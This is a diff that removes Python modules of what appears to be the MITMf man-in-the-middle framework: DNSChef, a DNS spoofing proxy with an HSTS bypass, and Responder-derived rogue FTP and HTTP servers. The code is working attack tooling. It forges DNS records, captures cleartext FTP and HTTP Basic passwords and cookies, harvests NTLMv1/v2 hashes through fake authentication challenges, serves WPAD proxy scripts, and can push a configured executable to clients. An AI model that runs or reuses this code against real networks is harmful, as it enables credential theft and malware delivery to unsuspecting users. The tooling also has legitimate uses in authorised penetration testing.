Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == "\x25\x00":
s.close()
return ParsePacket(data)
except:
pass
def BecomeBackup(data,Client):
try:
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
if ReqType == "Become Backup Browser":
ServerName = BrowserPacket[1:]
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role = NBT_NS_Role(data[45:48])
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
print RAPThisDomain(Client, Domain)
except:
pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
print RAPThisDomain(Client, Domain)
except:
pass
class Browser1(BaseRequestHandler):
def handle(self):
try:
request, socket = self.request
if settings.Config.AnalyzeMode:
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception:
pass

View file

@ -1,522 +0,0 @@
# DNSChef is a highly configurable DNS Proxy for Penetration Testers
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
# for the latest version and documentation. Please forward all issues and
# concerns to iphelix [at] thesprawl.org.
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading, random, operator, time
import SocketServer, socket, sys, os
import binascii
import string
import base64
import time
import logging
from configobj import ConfigObj
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
from core.logger import logger
from dnslib import *
from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
def parse(self,data):
nametodns = DNSChef().nametodns
nameservers = DNSChef().nameservers
hsts = DNSChef().hsts
hstsconfig = DNSChef().real_records
server_address = DNSChef().server_address
clientip = {"clientip": self.client_address[0]}
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
# Find all matching fake DNS records for the query name or get False
fake_records = dict()
for record in nametodns:
fake_records[record] = self.findnametodns(qname, nametodns[record])
if hsts:
if qname in hstsconfig:
response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
return response
elif qname[:4] == 'wwww':
response = self.hstsbypass(qname[1:], qname, nameservers, d)
return response
elif qname[:3] == 'web':
response = self.hstsbypass(qname[3:], qname, nameservers, d)
return response
# Check if there is a fake record for the current request qtype
if qtype in fake_records and fake_records[qtype]:
fake_record = fake_records[qtype]
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
for qtype,fake_record in fake_records.items():
if fake_record:
# NOTE: RDMAP is a dictionary map of qtype strings to handling classses
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement and replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
return response
# Find appropriate ip address to use for a queried name. The function can
def findnametodns(self,qname,nametodns):
# Make qname case insensitive
qname = qname.lower()
# Split and reverse qname into components for matching.
qnamelist = qname.split('.')
qnamelist.reverse()
# HACK: It is important to search the nametodns dictionary before iterating it so that
# global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
# NOTE: It is assumed that domain name was already lowercased
# when it was loaded through --file, --fakedomains or --truedomains
# don't want to waste time lowercasing domains on every request.
# Split and reverse domain into components for matching
domain = domain.split('.')
domain.reverse()
# Compare domains in reverse.
for a,b in map(None,qnamelist,domain):
if a != b and b != "*":
break
else:
# Could be a real IP or False if we are doing reverse matching with 'truedomains'
return host
else:
return False
# Obtain a response from a real DNS server.
def proxyrequest(self, request, host, port="53", protocol="udp"):
clientip = {'clientip': self.client_address[0]}
reply = None
try:
if DNSChef().ipv6:
if protocol == "udp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
if protocol == "udp":
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
# Send the proxy request to a randomly chosen DNS server
if protocol == "udp":
sock.sendto(request, (host, int(port)))
reply = sock.recv(1024)
sock.close()
elif protocol == "tcp":
sock.connect((host, int(port)))
# Add length for the TCP request
length = binascii.unhexlify("%04x" % len(request))
sock.sendall(length+request)
# Strip length from the response
reply = sock.recv(1024)
reply = reply[2:]
sock.close()
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
nameserver_tuple = random.choice(nameservers).split('#')
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
#Create the DNS response
for res in dns_rr:
if res.get_rname() == real_domain:
res.set_rname(fake_domain)
response.add_answer(res)
else:
response.add_answer(res)
return response.pack()
# UDP DNS Handler for incoming requests
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
(data,socket) = self.request
response = self.parse(data)
if response:
socket.sendto(response, self.client_address)
# TCP DNS Handler for incoming requests
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
# Remove the addition "length" parameter used in the
# TCP DNS protocol
data = data[2:]
response = self.parse(data)
if response:
# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
class DNSChef(ConfigWatcher):
version = "0.4"
tcp = False
ipv6 = False
hsts = False
real_records = {}
nametodns = {}
server_address = "0.0.0.0"
nameservers = ["8.8.8.8"]
port = 53
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def on_config_change(self):
config = self.config['MITMf']['DNS']
self.port = int(config['port'])
# Main storage of domain filters
# NOTE: RDMAP is a dictionary map of qtype strings to handling classe
for qtype in RDMAP.keys():
self.nametodns[qtype] = dict()
# Adjust defaults for IPv6
if config['ipv6'].lower() == 'on':
self.ipv6 = True
if config['nameservers'] == "8.8.8.8":
self.nameservers = "2001:4860:4860::8888"
# Use alternative DNS servers
if config['nameservers']:
self.nameservers = []
if type(config['nameservers']) is str:
self.nameservers.append(config['nameservers'])
elif type(config['nameservers']) is list:
self.nameservers = config['nameservers']
for section in config.sections:
if section in self.nametodns:
for domain,record in config[section].iteritems():
# Make domain case insensitive
domain = domain.lower()
self.nametodns[section][domain] = record
for k,v in self.config["SSLstrip+"].iteritems():
self.real_records[v] = k
def setHstsBypass(self):
self.hsts = True
def start(self):
self.on_config_change()
self.start_config_watch()
try:
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
self.startTCP()
else:
self.startUDP()
except socket.error as e:
if "Address already in use" in e:
shutdown("\n[DNS] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
# Initialize and start the DNS Server
def startUDP(self):
server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
# Initialize and start the DNS Server
def startTCP(self):
server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()

View file

@ -1,87 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import threading
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import FTPPacket
class FTP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 21), FTP1)
else:
server = ThreadingTCPServer(('', 21), FTP1)
t = threading.Thread(name='SMB', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class FTP1(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(FTPPacket()))
data = self.request.recv(1024)
if data[0:4] == "USER":
User = data[5:].strip()
Packet = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(str(Packet))
data = self.request.recv(1024)
if data[0:4] == "PASS":
Pass = data[5:].strip()
Packet = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(str(Packet))
data = self.request.recv(1024)
SaveToDb({
'module': 'FTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+':'+Pass
})
else:
Packet = FTPPacket(Code="502",Message="Command not implemented.")
self.request.send(str(Packet))
data = self.request.recv(1024)
except Exception:
pass

View file

@ -1,356 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from SocketServer import BaseServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
from base64 import b64decode, b64encode
from core.responder.utils import *
from core.logger import logger
from core.responder.packets import NTLM_Challenge
from core.responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
from core.responder.packets import WPADScript, ServeExeFile, ServeHtmlFile
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("HTTP", formatter)
class HTTP:
static_endpoints = {}
endpoints = {}
@staticmethod
def add_endpoint(url, content_type, payload):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
Buffer.calculate()
HTTP.endpoints['/' + url] = Buffer
@staticmethod
def add_static_endpoint(url, content_type, path):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
def start(self):
try:
#if OsInterfaceIsSupported():
#server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
#else:
server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting HTTP server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Parse NTLMv1/v2 hash.
def ParseHTTPHash(data, client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv1',
'client': client,
'host': HostName,
'user': User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv2',
'client': client,
'host': HostName,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
log.info("[HTTP] Cookie : {}".format(Cookie))
return Cookie
else:
return False
def GrabHost(data, host):
Host = re.search('(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
log.info("[HTTP] Host : {}".format(Host, 3))
return Host
else:
return False
def WpadCustom(data, client):
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
else:
return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
data = bk.read()
bk.close()
return data
def RespondWithFile(client, filename, dlname=None):
if filename.endswith('.exe'):
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
else:
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
Buffer.calculate()
log.info("{} [HTTP] Sending file {}".format(filename, client))
return str(Buffer)
def GrabURL(data, host):
GET = re.findall('(?<=GET )[^HTTP]*', data)
POST = re.findall('(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET:
req = ''.join(GET).strip()
log.info("[HTTP] {} - - GET '{}'".format(host, req))
return req
if POST:
req = ''.join(POST).strip()
log.info("[HTTP] {} - - POST '{}'".format(host, req))
if len(''.join(POSTDATA)) > 2:
log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
return req
# Handle HTTP packet sequence.
def PacketSequence(data, client):
NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
# Serve the .exe if needed
if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
if settings.Config.Serve_Html == True:
return RespondWithFile(client, settings.Config.Html_Filename)
WPAD_Custom = WpadCustom(data, client)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(Buffer))
return str(Buffer_Ans)
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, client)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
log.info("{} [HTTP] WPAD (auth) file sent".format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
SaveToDb({
'module': 'HTTP',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.split(':')[0],
'cleartext': ClearText_Auth.split(':')[1],
})
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
else:
if settings.Config.Basic == True:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending BASIC authentication request".format(client))
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response)
# HTTP Server class
class HTTP1(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(1)
data = self.request.recv(8092)
req_url = GrabURL(data, self.client_address[0])
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
resp = HTTP.endpoints[req_url.strip()]
self.request.send(str(resp))
if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
path = HTTP.static_endpoints[req_url.strip()]['path']
Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
with open(path, 'r') as file:
Buffer.fields['Payload'] = file.read()
Buffer.calculate()
self.request.send(str(Buffer))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.request.send(Buffer)
except socket.error:
pass
# HTTPS Server class
class HTTPS(StreamRequestHandler):
def setup(self):
self.exchange = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def handle(self):
try:
while True:
data = self.exchange.recv(8092)
self.exchange.settimeout(0.5)
Buffer = WpadCustom(data,self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.exchange.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.exchange.send(Buffer)
except:
pass
# SSL context handler
class SSLSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
from OpenSSL import SSL
BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self,request):
try:
request.shutdown()
except:
pass

View file

@ -1,84 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from core.responder.utils import *
